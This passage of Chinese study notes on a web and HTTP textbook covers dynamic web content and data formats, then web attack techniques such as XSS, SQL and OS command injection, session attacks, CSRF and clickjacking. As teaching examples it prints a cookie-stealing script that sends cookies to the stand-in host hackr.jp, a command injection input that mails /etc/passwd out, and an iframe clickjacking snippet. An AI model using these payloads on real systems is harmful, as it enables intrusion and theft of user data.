1304 | 
1305 | **9.3.1 通过 Web 提供功能的 Web 应用**
1306 | 
1307 | Web 应用是指通过 Web 功能提供的应用程序。比如购物网站、网上 银行、SNS、BBS、搜索引擎和 e-learning 等。互联网（Internet）或企 业内网（Intranet）上遍布各式各样的 Web 应用。
1308 | 
1309 | 原本应用 HTTP 协议的 Web 的机制就是对客户端发来的请求，返回事前准备好的内容。可随着 Web 越来越普及，仅靠这样的做法已不 足以应对所有的需求，更需要引入由程序创建 HTML内容的做法。
1310 | 
1311 | 类似这种由程序创建的内容称为动态内容，而事先准备好的内容称为静态内容。Web 应用则作用于动态内容之上。
1312 | 
1313 | ![[Pasted image 20220920161405.png]]
1314 | 
1315 | **9.3.2 与 Web 服务器及程序协作的 CGI**
1316 | 
1317 | CGI（Common Gateway Interface，通用网关接口）是指 Web 服务器在接收到客户端发送过来的请求后转发给程序的一组机制。在 CGI 的作用下，程序会对请求内容做出相应的动作，比如创建 HTML等动态内容。
1318 | 
1319 | 使用 CGI 的程序叫做 CGI 程序，通常是用 Perl、PHP、Ruby 和 C 等 编程语言编写而成。
1320 | 
1321 | ![[Pasted image 20220920161514.png]]
1322 | 
1323 | **9.3.3 因 Java 而普及的 Servlet**
1324 | 
1325 | Servlet 是一种能在服务器上创建动态内容的程序。Servlet 是用 Java 语言实现的一个接口，属于面向企业级 Java（JavaEE，Java Enterprise Edition）的一部分。
1326 | 
1327 | > Servlet 没有对应中文译名，全称是 Java Servlet。名称取自 Servlet=Server+Applet，表示 轻量服务程序。——译者注
1328 | 
1329 | 之前提及的 CGI，由于每次接到请求，程序都要跟着启动一次。因此 一旦访问量过大，Web 服务器要承担相当大的负载。而 Servlet 运行 在与 Web 服务器相同的进程中，因此受到的负载较小。Servlet 的运 行环境叫做 Web 容器或 Servlet 容器。
1330 | 
1331 | > Servlet 常驻内存，因此在每次请求时，可启动相对进程级别更为轻量的Servlet，程序的执行效率从而变得更高。——译者注
1332 | 
1333 | Servlet 作为解决 CGI 问题的对抗技术，随 Java 一起得到了普及。
1334 | 
1335 | > 说对抗的原因在于，这个方向上已存在用 Perl 编写的 CGI，实现在 Apache HTTP Server 上内置 mod_php 模块后可运行 PHP 程序、微软主导的 ASP 等技术。 ——译者注
1336 | 
1337 | 随着 CGI 的普及，每次请求都要启动新 CGI 程序的 CGI 运行机制逐 渐变成了性能瓶颈，所以之后 Servlet 和 mod_perl 等可直接在 Web 服 务器上运行的程序才得以开发、普及。
1338 | 
1339 | ### 9.4 数据发布的格式及语言
1340 | 
1341 | **9.4.1 可拓展标记语言**
1342 | 
1343 | XML（eXtensible Markup Language，可扩展标记语言）是一种可按应用目标进行扩展的通用标记语言。旨在通过使用 XML，使互联网数 据共享变得更容易。
1344 | 
1345 | XML和 HTML都是从标准通用标记语言 SGML（Standard Generalized Markup Language）简化而成。与 HTML相比，它对数据的记录方式做了特殊处理。
1346 | 
1347 | 下面我们以 HTML编写的某公司的研讨会议议程为例进行说明。
1348 | 
1349 | ```html
1350 | <html>
1351 | <head>
1352 | <title>T公司研讨会介绍</title>
1353 | </head>
1354 | <body>
1355 | <h1>T公司研讨会介绍</h1>
1356 | <ul>
1357 | 	<li>研讨会编号：TR001
1358 | 		<ul>
1359 | 			<li>Web应用程序脆弱性诊断讲座</li>
1360 | 		</ul>
1361 | 	</li>
1362 | 	<li>研讨会编号：TR002
1363 | 		<ul>
1364 | 			<li>网络系统脆弱性诊断讲座</li>
1365 | 		</ul>
1366 | 	</li>
1367 | </ul>
1368 | </body>
1369 | </html>
1370 | ```
1371 | 
1372 | 用浏览器打开该文档时，就会显示排列的列表内容，但如果这些数据被其他程序读取会发生什么？某些程序虽然具备可通过识别布局特征取出文本的方法，但这份 HTML的样式一旦改变，要读取数据内容 也就变得相对困难了。可见，为了保持数据的正确读取，HTML不适 合用来记录数据结构。
1373 | 
1374 | 接着将这份列表以 XML的形式改写就成了以下的示例。
1375 | 
1376 | ```html
1377 | <研讨会 编号="TR001" 主题="Web应用程序脆弱性诊断讲座">
1378 | 	<类别>安全</类别>
1379 | 	<概要>为深入研究Web应用程序脆弱性诊断必要的…</概要>
1380 | </研讨会>
1381 | <研讨会 编号="TR002" 主题="网络系统脆弱性诊断讲座">
1382 | 	<类别>安全</类别>
1383 | 	<概要>为深入研究网络系统脆弱性诊断必要的…</概要>
1384 | </研讨会>
1385 | ```
1386 | 
1387 | XML和 HTML一样，使用标签构成树形结构，并且可自定义扩展标签.
1388 | 
1389 | 从 XML 文档中读取数据比起 HTML更为简单。由于 XML 的结构基本上都是用标签分割而成的树形结构，因此通过语法分析器 （Parser）的解析功能解析 XML结构并取出数据元素，可更容易地对 数据进行读取。
1390 | 
1391 | 更容易地复用数据使得 XML在互联网上被广泛接受。比如，可用在 2 个不同的应用之间的交换数据格式化。
1392 | 
1393 | **9.4.2 发布更新信息的 RSS/Atom**
1394 | 
1395 | RSS（简易信息聚合，也叫聚合内容）和 Atom 都是发布新闻或博客 日志等更新信息文档的格式的总称。两者都用到了 XML。
1396 | 
1397 | RSS 有以下版本，名称和编写方式也不相同。
1398 | 
1399 | - RSS 0.9（RDFSite Summary）：最初的 RSS 版本。1999 年 3 月由网 景通信公司自行开发用于其门户网站。基础构图创建在初期的 RDF 规格上。 
1400 | - RSS 0.91（Rich Site Summary）：在 RSS0.9 的基础上扩展元素，于 1999 年 7 月开发完毕。非 RDF 规格，使用 XML方式编写。 RSS 1.0（RDFSite Summary）：RSS 规格正处于混乱状态。2000 年 12 月由 RSS-DEV 工作组再次采用 RSS0.9 中使用的 RDF 规格发布。 
1401 | - RSS2.0（Really Simple Syndication）：非 RSS1.0 发展路线。增加支 持 RSS0.91 的兼容性，2000 年 12 月由 UserLand Software 公司开发完 成。
1402 | 
1403 | Atom 具有以下两种标准。
1404 | 
1405 | - Atom 供稿格式（Atom Syndication Format）：为发布内容而制定的 网站消息来源格式，单讲 Atom 时，就是指此标准。 
1406 | - Atom 出版协定（Atom Publishing Protocol）：为 Web 上内容的新增 或修改而制定的协议。
1407 | 
1408 | 用于订阅博客更新信息的 RSS 阅读器，这种应用几乎支持 RSS 的所 有版本以及 Atom。
1409 | 
1410 | RSS1.0 示例
1411 | 
1412 | ```rss
1413 | <?xml version="1.0" encoding="utf-8" ?>
1414 | <?xml-stylesheet href="http://d.hatena.ne.jp/sen-u/rssxsl" type="text/xsl" media="screen"?>
1415 | <rdf:RDF
1416 | xmlns="http://purl.org/rss/1.0/"
1417 | xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
1418 | xmlns:content="http://purl.org/rss/1.0/modules/content/"
1419 | xmlns:dc="http://purl.org/dc/elements/1.1/"
1420 | xml:lang="ja">
1421 | <channel rdf:about="http://d.hatena.ne.jp/sen-u/rss">
1422 | <title>兔子的文学日记</title>
1423 | <link>http://d.hatena.ne.jp/sen-u/</link>
1424 | <description>兔子的文学日记</description>
1425 | </channel>
1426 | 
1427 | <item rdf:about="http://d.hatena.ne.jp/sen-u/20121215/p1">
1428 | <title>[security]提供脆弱性悬赏奖金计划的网站一览</title>
1429 | <link>http://d.hatena.ne.jp/sen-u/20121215/p1</link>
1430 | <description> 正是所谓“是所谓 Bounty Programs”、处理接受Web脆弱性的相关信息，并提供奖金的计划 ...</description>
1431 | <dc:creator>sen-u</dc:creator>
1432 | <dc:date>2012-12-15</dc:date>
1433 | <dc:subject>security</dc:subject>
1434 | </item>
1435 | ```
1436 | 
1437 | **9.4.3 JavaScript 衍生的轻量级易用 JSON**
1438 | 
1439 | JSON（JavaScript Object Notation）是一种以 JavaScript（ECMAScript）的对象表示法为基础的轻量级数据标记语 言。能够处理的数据类型有 false/null/true/ 对象 / 数组 / 数字 / 字符 串，这 7 种类型。
1440 | 
1441 | `{"name": "Web Application Security", "num": "TR001"}`
1442 | 
1443 | JSON 让数据更轻更纯粹，并且 JSON 的字符串形式可被 JavaScript 轻易地读入。当初配合 XML使用的 Ajax 技术也让 JSON 的应用变得 更为广泛。另外，其他各种**编程语言**也提供丰富的**库**类，以达到轻便操作 JSON 的目的。
1444 | 
1445 | ## 第十章 Web 的攻击技术
1446 | 
1447 | ### 10.1 针对 Web 的攻击技术
1448 | 
1449 | 简单的 HTTP 协议本身并不存在安全性问题，因此协议本身几乎不会成为攻击的对象。应用 HTTP 协议的服务器和客户端，以及运行在服务器上的 Web 应用等资源才是攻击目标。 
1450 | 
1451 | **10.1.1 HTTP 不具备必要的安全功能**
1452 | 
1453 | 与最初的设计相比，现今的 Web 网站应用的 HTTP 协议的使用方式 已发生了翻天覆地的变化。几乎现今所有的 Web 网站都会使用会话 （session）管理、加密处理等安全性方面的功能，而 HTTP 协议内并 不具备这些功能。
1454 | 
1455 | 从整体上看，HTTP 就是一个通用的单纯协议机制。因此它具备较多优势，但是在安全性方面则呈劣势。
1456 | 
1457 | 就拿远程登录时会用到的 SSH 协议来说，SSH 具备协议级别的认证及会话管理等功能，HTTP 协议则没有。另外在架设 SSH 服务方面，任何人都可以轻易地创建安全等级高的服务，而 HTTP 即使已架设好服务器，但若想提供服务器基础上的 Web 应用，很多情况下都需要重新开发。
1458 | 
1459 | 开发者需要自行设计并开发认证及会话管理功能来满足 Web 应用的安全。而自行设计就意味着会出现各种形形色色的实现。结果，安全等级并不完备，可仍在运作的 Web 应用背后却隐藏着各种容易被攻击者滥用的安全漏洞的 Bug。
1460 | 
1461 | **10.1.2 在客户端即可篡改请求**
1462 | 
1463 | 在 Web 应用中，从浏览器那接收到的 HTTP 请求的全部内容，都可以在客户端自由地变更、篡改。所以 Web 应用可能会接收到与预期数据不相同的内容。
1464 | 
1465 | 在 HTTP 请求报文内加载攻击代码，就能发起对 Web 应用的攻击。 通过 **URL** **查询字段或表单**、**HTTP 首部**、**Cookie** 等途径把攻击代码传 入，若这时 Web 应用存在安全漏洞，那内部信息就会遭到窃取，或被攻击者拿到管理权限。
1466 | 
1467 | ![[Pasted image 20220920163224.png]]
1468 | 
1469 | **10.1.3 针对 Web 的应用攻击模式**
1470 | 
1471 | **以服务器为目标的主动攻击**
1472 | 
1473 | 主动攻击 (active attack) 是指攻击者通过直接访问 Web 应用, 把攻击代码传入的攻击模式. 由于该模式是直接针对服务器上的资源进行攻击, 因此攻击者需要能够访问到那些资源
1474 | 
1475 | 主动攻击力最具有代表性的攻击是 SQL 注入和 OS 命令注入攻击
1476 | 
1477 | ![[Pasted image 20220920163435.png]]
1478 | 
1479 | **以服务器为目标的被动攻击**
1480 | 
1481 | 被动攻击（passive attack）是指利用圈套策略执行攻击代码的攻击模式。在被动攻击过程中，攻击者不直接对目标 Web 应用访 问发起攻击。
1482 | 
1483 | 被动攻击通常的攻击模式如下所示。
1484 | 
1485 | - 步骤 1： 攻击者诱使用户触发已设置好的陷阱，而陷阱会启动发送已嵌入攻击代码的 HTTP 请求。 
1486 | - 步骤 2： 当用户不知不觉中招之后，**用户的浏览器或邮件客户端**就会**触发这个陷阱**。 
1487 | - 步骤 3： 中招后的**用户**浏览器会把含有攻击代码的 HTTP 请求发送给作为攻击目标的 Web 应用，**运行攻击代码**。
1488 | - 步骤 4： 执行完攻击代码，存在安全漏洞的 Web 应用会成为攻击者的跳板，可能导致用户所持的 **Cookie** 等**个人信息被窃取**， 登录状态中的用户权限遭恶意滥用等后果。 
1489 | 
1490 | 被动攻击模式中具有代表性的攻击是跨站脚本攻击和跨站点请求伪造。
1491 | 
1492 | ![[Pasted image 20220920163717.png]]
1493 | 
1494 | **利用用户的身份攻击企业内部网络**
1495 | 
1496 | 利用被动攻击, 可发起对原本从互联网上无法直接访问的企业内网等网络的攻击。只要用户踏入攻击者预先设好的陷阱，在用户能够访问到的网络范围内，即使是企业内网也同样会受到攻击。
1497 | 
1498 | 很多企业内网依然可以连接到互联网上，访问 Web 网站，或接收互联网发来的邮件。这样就可能给攻击者以可乘之机，诱导用 户触发陷阱后对企业内网发动攻击。
1499 | 
1500 | ![[Pasted image 20220920192003.png]]
1501 | 
1502 | ### 10.2 因输出值转义不完全引发的安全漏洞
1503 | 
1504 | 实施 Web 应用的安全对策可大致分为以下两部分。
1505 | 
1506 | - 客户端的验证
1507 | - Web 应用端 (服务器端) 的验证
1508 | 	- 输入值验证
1509 | 	- 输出值转义
1510 | 
1511 | ![[Pasted image 20220920192058.png]]
1512 | 
1513 | 多数情况下采用 **JavaScript** 在客户端验证数据。可是在客户端允许**篡改数据**或**关闭 JavaScript**，不适合将 JavaScript 验证作为安全的防范对策。保留客户端验证只是为了尽早地辨识输入错误，起到**提高 UI 体验**的作用。
1514 | 
1515 | Web 应用端的输入值验证按 Web 应用内的处理则有可能被误认为是具有攻击性意义的代码。输入值验证通常是指检查是否是符合系统业务逻辑的数值或检查字符编码等预防对策。
1516 | 
1517 | 从数据库或文件系统、HTML、邮件等输出 Web 应用处理的数据之际，针对输出做值转义处理是一项至关重要的安全策略。当输出值转义不完全时，会因触发攻击者传入的攻击代码，而给输出对象带来损害。
1518 | 
1519 | **10.2.1 跨站脚本攻击**
1520 | 
1521 | 跨站脚本攻击（Cross-Site Scripting，XSS）是指通过存在安全漏洞的 Web 网站注册用户的浏览器内运行非法的 **HTML 标签**或 **JavaScript** 进行的一种攻击。动态创建的 HTML部分有可能隐藏着安全漏洞。就这样，攻击者编写脚本设下陷阱，用户在自己的浏览器上运行时，一 不小心就会受到被动攻击。
1522 | 
1523 | 跨站脚本可能造成以下影响
1524 | 
1525 | - 利用虚假输入表单骗取用户个人信息 (钓鱼)
1526 | - 利用脚本窃取用户 Cookie 值, 被害者在不知情的情况下, 帮助攻击者发送恶意请求
1527 | - 显示伪造的文章或图片
1528 | 
1529 | **跨站脚本攻击案例**
1530 | 
1531 | 在动态生成 HTML 处发生
1532 | 
1533 | 下面以编辑个人信息页面为例讲解跨站脚本攻击. 下方界面显示了用户输入的个人信息内容
1534 | 
1535 | ![[Pasted image 20220920193018.png]]
1536 | 
1537 | 确认界面按原样在编辑界面输入的字符串. 此处输入带有山口一郎这样的 HTML 标签的字符串
1538 | 
1539 | ![[Pasted image 20220920193059.png]]
1540 | 
1541 | 此时的确认界面上, 浏览器会把用户输入的 `<s>` 解析成 html 标签, 然后显示删除线爱你
1542 | 
1543 | 删除线显示出来并不会造成什么后果, 但如果换成 script 标签, 就有可能被利用而设置 XSS 陷阱
1544 | 
1545 | 跨站脚本攻击属于被动攻击模式, 需要受害者点击陷阱才会触发.
1546 | 
1547 | 下面是网站拖过地址栏 URI 的查询字段指定 ID, 即相当于在表单内自动填写字符串的功能. 而就在这地方, 隐藏着可执行跨站脚本攻击的漏洞
1548 | 
1549 | ![[Pasted image 20220920193252.png]]
1550 | 
1551 | 充分熟知此处漏洞特点的攻击者，于是就创建了下面这段嵌入恶 意代码的 URL。并隐藏植入事先准备好的欺诈邮件中或 Web 页 面内，诱使用户去点击该 URL。
1552 | 
1553 | `http://example.jp/login?ID="><script>alert(123)</script>`
1554 | 
1555 | 用户打开浏览器页面后, 即执行 `<script>alert(123)</script>` 弹出窗口
1556 | 
1557 | 正常访问时的 HTML 源代码
1558 | 
1559 | ```html
1560 | <div class="logo">
1561 | 	<img src="/img/logo.gif" alt="E! 拍卖会" />
1562 | </div>
1563 | <form action="http://example.jp/login" method="post" id="login">
1564 | <div class="input_id">
1565 | 	ID <input type="text" name="ID" value="yama" />
1566 | </div>
1567 | ```
1568 | 
1569 | 访问恶意链接时的 HTML 源代码
1570 | 
1571 | ```html
1572 | <div class="logo">
1573 | 	<img src="/img/logo.gif" alt="E! 拍卖会 />
1574 | </div>
1575 | <form action="http://example.jp/login" method="post" id="login">
1576 | <div class="input_id">
1577 | 	ID <input type="text" name="ID" value=""><script>alert(123)</script>
1578 | </div>
1579 | ```
1580 | 
1581 | **对用户 Cookie 的窃取攻击**
1582 | 
1583 | 除了在表单中设下圈套之外, 下面这种恶意脚本同样能够以跨站脚本攻击的方式, 窃取到用户的 Cookie 信息.
1584 | 
1585 | ```javascript
1586 | <script src="http://hacker.jp/xss.js></script>
1587 | ```
1588 | 该脚本内指定的 `http://hacker.jp/xss.js` 文件内容如下
1589 | 
1590 | ```javascript
1591 | var content = escape(document.cookie);
1592 | document.write("<img src=http://hackr.jp/?");
1593 | document.write(content);
1594 | document.write(">");
1595 | ```
1596 | 
1597 | 在存在可跨站脚本攻击安全漏洞的 Web 应用上执行上面这段 JavaScript 程序，即可访问到该 Web 应用所处域名下的 Cookie 信息。然后这些信息会发送至攻击者的 Web 网站（http://hackr.jp/），记录在他的登录日志中。结果，攻击者就这样窃取到用户的 Cookie 信息了。
1598 | 
1599 | **10.2.2 SQL 注入攻击**
1600 | 
1601 | SQL注入（SQLInjection）是指针对 Web 应用使用的数据库，通过运行非法的 SQL而产生的攻击。该安全隐患有可能引发极大的威胁，有时会直接导致个人信息及机密信息的泄露。
1602 | 
1603 | SQL注入攻击有可能会造成以下等影响。 
1604 | 
1605 | - 非法查看或篡改数据库内的数据
1606 | - 规避认证
1607 | - 执行和数据库服务器业务关联的程序等
1608 | 
1609 | SQL 攻击示例
1610 | 
1611 | ```mysql
1612 | # 原始语句
1613 | SELECT FROM bookTbl WHERE author ='Sq' and flag = 1;
1614 | 
1615 | # 恶意语句
1616 | SELECT FROM bookTbl WHERE author='上野宣--'and flag = 1;
1617 | ```
1618 | **10.2.3 OS 命令注入攻击**
1619 | 
1620 | OS 命令注入攻击（OS Command Injection）是指通过 Web 应用，执行非法的操作系统命令达到攻击的目的。只要在能调用 Shell 函数的地方就有存在被攻击的风险。
1621 | 
1622 | OS 注入攻击案例
1623 | 
1624 | 表单核心代码
1625 | 
1626 | ```java
1627 | 
1628 | my $adr = $q->param('mailaddress');
1629 | open(MAIL, "| /usr/sbin/sendmail $adr");
1630 | print MAIL "From: info@example.com\n";
1631 | ```
1632 | 
1633 | 用户构造恶意输入内容: `; cat /etc/passwd | mail hack@example.jp`
1634 | 
1635 | 程序执行的命令: `| /usr/sbin/sendmail ; cat /etc/passwd | mail hack@example.jp`
1636 | 
1637 | 攻击者的输入值中含有分号（;）。这个符号在 OS 命令中，会被
1638 | 解析为分隔多个执行命令的标记。
1639 | 
1640 | **10.2.4 HTTP 首部注入攻击**
1641 | 
1642 | HTTP 首部注入攻击（HTTP Header Injection）是指攻击者通过在响应首部字段内插入换行，添加任意响应首部或主体的一种攻击。属于被动攻击模式。
1643 | 
1644 | 向首部主体内添加内容的攻击称为 HTTP 响应截断攻击（HTTP
1645 | Response Splitting Attack）。
1646 | 
1647 | 如下所示，Web 应用有时会把从外部接收到的数值，赋给响应首部字段 Location 和 Set-Cookie。
1648 | 
1649 | ```http
1650 | Location: http://www.example.com/a.cgi?q=12345
1651 | Set-Cookie: UID=12345
1652 | ＊12345就是插入值
1653 | ```
1654 | HTTP 首部注入可能像这样，通过在某些响应首部字段需要处理输出值的地方，插入换行发动攻击。
1655 | 
1656 | HTTP 首部注入攻击有可能会造成以下一些影响。
1657 | 
1658 | - 设置任何 Cookie 信息
1659 | - 重定向至任意 URL
1660 | - 显示任意的主题 (HTTP 响应截断攻击)
1661 | 
1662 | **HTTP 首部注入攻击案例 / HTTP 响应截断攻击**
1663 | 
1664 | 参考 sqli-labs-Less18-19
1665 | 
1666 | **10.2.5 邮件首部注入攻击** 省略
1667 | 
1668 | **10.2.6 目录遍历攻击** 省略
1669 | 
1670 | **10.2.7 文件包含漏洞** 省略
1671 | 
1672 | ### 10.3 因设置或设计上的缺陷引发的安全漏洞 (大概率已过时)
1673 | 
1674 | 因设置或设计上的缺陷引发的安全漏洞是指，错误设置 Web 服务
1675 | 器，或是由设计上的一些问题引起的安全漏洞。
1676 | 
1677 | **11.3.1 强制浏览**
1678 | 
1679 | 强制浏览（Forced Browsing）安全漏洞是指，从安置在 Web 服务器的公开目录下的文件中，浏览那些原本非自愿公开的文件
1680 | 
1681 | 强制浏览有可能会造成以下一些影响。
1682 | 
1683 | - 泄露顾客的个人信息等重要情报
1684 | - 泄露原本需要具有访问权限的用户才可查阅的信息内容
1685 | - 泄露未外连到外界的文件
1686 | 
1687 | 对那些原本不愿公开的文件，为了保证安全会隐蔽其 URL。可一旦知道了那些 URL，也就意味着可浏览 URL对应的文件。直接显示容易推测的文件名或文件目录索引时，通过某些方法可能会使 URL产生泄露。
1688 | 
1689 | 
1690 | **文件目录一览**
1691 | 
1692 | `http://www.example.com/log/`
1693 | 
1694 | 通过指定文件目录名称，即可在文件一览中看到显示的文件名。容易被推测的文件名及目录名
1695 | 
1696 | `http://www.example.com/entry/entry_081202.log`
1697 | 
1698 | 文件名称容易推测（按上面的情况，可推出下一个文件是entry_081203.log）
1699 | 
1700 | 备份文件
1701 | 
1702 | ```text
1703 | http://www.example.com/cgi-bin/entry.cgi（原始文件）
1704 | http://www.example.com/cgi-bin/entry.cgi~（备份文件）
1705 | http://www.example.com/cgi-bin/entry.bak（备份文件）
1706 | ```
1707 | 
1708 | 由编辑软件自动生成的备份文件无执行权限，有可能直接以源代码形式显示经认证才可显示的文件直接通过 URL访问原本必须经过认证才能在 Web 页面上使用的文件（HTML文件、图片、PDF 等文档、CSS 以及其他数据等）
1709 | 
1710 | **强制浏览导致安全漏洞的案例**
1711 | 
1712 | 下面我们以会员制度的 SNS 日记功能为例，讲解强制浏览可能导致的安全漏洞。该日记功能保证了除具有访问权限的用户本人以外，其他人都不能访问日记。
1713 | 
1714 | 该日记中包含的图像照片的源代码如下所示。
1715 | 
1716 | ``<img src="http://example.com/img/tRNqSUBdG7Da.jpg">`
1717 | 
1718 | 即使没有对这篇日记的访问权限，只要知道这图片的 URL，通过直接指定 URL的方式就能显示该图片。日记的功能和文本具有访问对象的控制，但不具备对图片访问对象的控制，从而产生了安全漏洞。
1719 | 
1720 | **10.3.2 不正确的错误消息处理**
1721 | 
1722 | 不正确的错误消息处理（Error Handling Vulnerability）的安全漏洞是指，Web 应用的错误信息内包含对攻击者有用的信息。与 Web 应用有关的主要错误信息如下所示。
1723 | 
1724 | - Web 应用抛出的错误消息
1725 | - 数据库等系统抛出的错误消息
1726 | 
1727 | Web 应用不必在用户的浏览画面上展现详细的错误消息。对攻击者来说，详细的错误消息有可能给他们下一次攻击以提示。
1728 | 
1729 | 常见的错误提示消息如下
1730 | 
1731 | - 用户未注册/账号不存在
1732 | - PHP 或 ASP 等脚本错误
1733 | - 数据库或中间件的错误
1734 | - Web 服务器的错误
1735 | 
1736 | **10.3.3 开放重定向**
1737 | 
1738 | 开放重定向 (Open Redirect) 是一种对指定的 URl 作重定向跳转的功能. 漏洞的存在可能导致用户访问正常网站时, 被恶意重定向至恶意站点.
1739 | 
1740 | **开放重定向的攻击案例**
1741 | 
1742 | ```
1743 | http://example.com/?redirect=http://www.tricorder.jp
1744 | ```
1745 | 
1746 | 攻击者把重定向指定的参数改写成已设好陷阱的 Web 网站对应
1747 | 的连接，如下所示。
1748 | 
1749 | ```
1750 | http://example.com/?redirect=http://hackr.jp
1751 | ```
1752 | 
1753 | ### 10.4 因会话管理疏忽引发的安全漏洞
1754 | 
1755 | **10.4.1 回话劫持**
1756 | 
1757 | 会话劫持（Session Hijack）是指攻击者通过某种手段拿到了用户的会话 ID，并非法使用此会话 ID 伪装成用户，达到攻击的目的。
1758 | 
1759 | 下面列举了几种攻击者可获得会话 ID 的途径。
1760 | 
1761 | - 通过非正规的生成方法推测会话 ID 
1762 | - 通过窃听或 XSS 攻击盗取会话 ID 
1763 | - 通过会话固定攻击（Session Fixation）强行获取会话 ID
1764 | 
1765 | **会话劫持攻击案例**
1766 | 
1767 | 下面我们以认证功能为例讲解会话劫持。这里的认证功能通过会话管理机制，会将成功认证的用户的会话 ID（SID）保存在用户浏览器的 Cookie 中。
1768 | 
1769 | 攻击者在得知该 Web 网站存在可跨站攻击（XSS）的安全漏洞后，就设置好用 JavaScript 脚本调用 `document.cookie` 以窃取Cookie 信息的陷阱，一旦用户踏入陷阱（访问了该脚本），攻击者就能获取含有会话 ID 的 Cookie。 (与 XSS 漏洞配合使用)
1770 | 
1771 | 攻击者拿到用户的会话 ID 后，往自己的浏览器的 Cookie 中设置该会话 ID，即可伪装成会话 ID 遭窃的用户，访问 Web 网站了。
1772 | 
1773 | **10.4.2 会话固定攻击**
1774 | 
1775 | 对以窃取目标会话 ID 为主动攻击手段的会话劫持而言，会话固定攻击（Session Fixation）攻击会强制用户使用攻击者指定的会话 ID，属于被动攻击。
1776 | 
1777 | **会话固定攻击案例**
1778 | 
1779 | 下面我们以认证功能为例讲解会话固定攻击。这个 Web 网站的
1780 | 认证功能，会在认证前发布一个会话 ID，若认证成功，就会在
1781 | 服务器内改变认证状态。
1782 | 
1783 | ![[Pasted image 20220920201349.png]]
1784 | 
1785 | 攻击者准备陷阱，先访问 Web 网站拿到会话 ID（SID=f5d1278e8109）。此刻，会话 ID 在服务器上的记录仍是（未认证）状态。（步骤① ~ ②）
1786 | 
1787 | 攻击者设置好强制用户使用该会话 ID 的陷阱，并等待用户拿着这个会话 ID 前去认证。一旦用户触发陷阱并完成认证，会话ID（SID=f5d1278e8109）在服务器上的状态（用户 A 已认证）就会被记录下来。（步骤③）
1788 | 
1789 | 攻击者估计用户差不多已触发陷阱后，再利用之前这个会话 ID 访问网站。由于该会话 ID 目前已是（用户 A 已认证）状态，于 是攻击者作为用户 A 的身份顺利登录网站。（步骤④）(类似于钓鱼)
1790 | 
1791 | **Session Adoption**
1792 | 
1793 | Session Adoption 是指 PHP 或 ASP.NET 能够接收处理未知会话 ID 的功能。
1794 | 
1795 | 恶意使用该功能便可跳过会话固定攻击的准备阶段，从 Web 网站 获得发行的会话 ID 的步骤。即，攻击者可私自创建会话 ID构成陷阱，中间件却会误以为该会话 ID 是未知会话 ID 而接受。
1796 | 
1797 | **10.4.3 跨站点请求伪造**
1798 | 
1799 | 跨站点请求伪造（Cross-Site Request Forgeries，CSRF）攻击是指攻击者通过设置好的陷阱，强制对已完成认证的用户进行非预期的个人信息或设定信息等某些状态更新，属于被动攻击。
1800 | 
1801 | 跨站点请求伪造有可能会造成以下等影响。
1802 | 
1803 | - 利用已通过认证的用户权限更新设定信息
1804 | - 利用已通过认证的用户权限购买商品
1805 | - 利用已通过认证的用户权限在留言板上发表言论
1806 | 
1807 | **跨站点请求伪造的攻击案例**
1808 | 
1809 | 下面以留言板功能为例，讲解跨站点请求伪造。该功能只允许已认证并登录的用户在留言板上发表内容
1810 | 
1811 | ![[Pasted image 20220920201723.png]]
1812 | 
1813 | 在该留言板系统上，受害者用户 A 是已认证状态。它的浏览器中的 Cookie 持有已认证的会话 ID（步骤①）。
1814 | 
1815 | 攻击者设置好一旦用户访问，即会发送在留言板上发表非主观行为产生的评论的请求的陷阱。用户 A 的浏览器执行完陷阱中的 请求后，留言板上也就会留下那条评论（步骤②）。
1816 | 
1817 | 触发陷阱之际，如果用户 A 尚未通过认证，则无法利用用户 A 的身份权限在留言板上发表内容。
1818 | 
1819 | ### 10.5 其他安全漏洞
1820 | 
1821 | **10.5.1 密码破解**
1822 | 
1823 | 密码破解攻击（Password Cracking）即算出密码，突破认证。攻击不 仅限于 Web 应用，还包括其他的系统（如 FTP 或 SSH 等），本节将 会讲解对具备认证功能的 Web 应用进行的密码破解。
1824 | 
1825 | 密码破解有以下两种手段。
1826 | 
1827 | - 通过网络的密码试错
1828 | - 对已加密密码的破解（指攻击者入侵系统，已获得加密或散列处理的密码数据的情况）
1829 | 
1830 | **通过网络的密码试错**
1831 | 
1832 | 穷举法/字典攻击
1833 | 
1834 | **对已加密密码的破解**
1835 | 
1836 | Web 应用在保存密码时，一般不会直接以明文的方式保存，通过
1837 | 散列函数做散列处理或加 salt 的手段对要保存的密码本身加密。
1838 | 那即使攻击者使用某些手段窃取密码数据，如果想要真正使用这
1839 | 些密码，则必须先通过解码等手段，把加密处理的密码还原成明
1840 | 文形式。
1841 | 
1842 | 通过穷举法·字典攻击进行类推/彩虹表/密钥/加密算法的漏洞
1843 | 
1844 | **10.5.2 点击劫持**
1845 | 
1846 | 点击劫持（Clickjacking）是指利用透明的按钮或链接做成陷阱，覆盖在 Web 页面之上。然后诱使用户在不知情的情况下，点击那个链接访问内容的一种攻击手段。这种行为又称为界面伪装 (UIRedressing).
1847 | 
1848 | 已设置陷阱的 Web 页面，表面上内容并无不妥，但早已埋入想让用 户点击的链接。当用户点击到透明的按钮时，实际上是点击了已指定 透明属性元素的 iframe 页面。
1849 | 
1850 | **点击劫持案例**
1851 | 
1852 | 下面以 SNS 网站的注销功能为例，讲解点击劫持攻击。利用该注销功能，注册登录的 SNS 用户只需点击注销按钮，就可以从 SNS 网站上注销自己的会员身份。
1853 | 
1854 | 攻击者在预料用户会点击的 Web 页面上设下陷阱。上图中钓鱼 游戏页面上的 PLAY 按钮就是这类陷阱的实例。
1855 | 
1856 | 在做过手脚的 Web 页面上，目标的 SNS 注销功能页面将作为透明层覆盖在游戏网页上。覆盖时，要保证 PLAY 按钮与注销按钮的页面所在位置保持一致。
1857 | 
1858 | iframe 页面中使用透明可点击按钮的示例
1859 | 
1860 | ```html
1861 | <iframe id="target" src="http://sns.example.jp/leave" style="opacity:0;filter:alpha(opacity=0)"></iframe>
1862 | <button style="position:absolute;top:100;left:100;z-index:-1">PLAY</button>
1863 | ```
1864 | 
1865 | 由于 SNS 网站作为透明层被覆盖，SNS 网站上处于登录状态的 用户访问这个钓鱼网站并点击页面上的 PLAY 按钮之后，等同于 点击了 SNS 网站的注销按钮。
1866 | 
1867 | **10.5.3 DoS 攻击**
1868 | 
1869 | DoS 攻击（Denial of Service attack）是一种让运行中的服务呈停止状 态的攻击。有时也叫做服务停止攻击或拒绝服务攻击。DoS 攻击的对 象不仅限于 Web 网站，还包括网络设备及服务器等。
1870 | 
1871 | 主要有以下两种 DoS 攻击方式。 
1872 | 
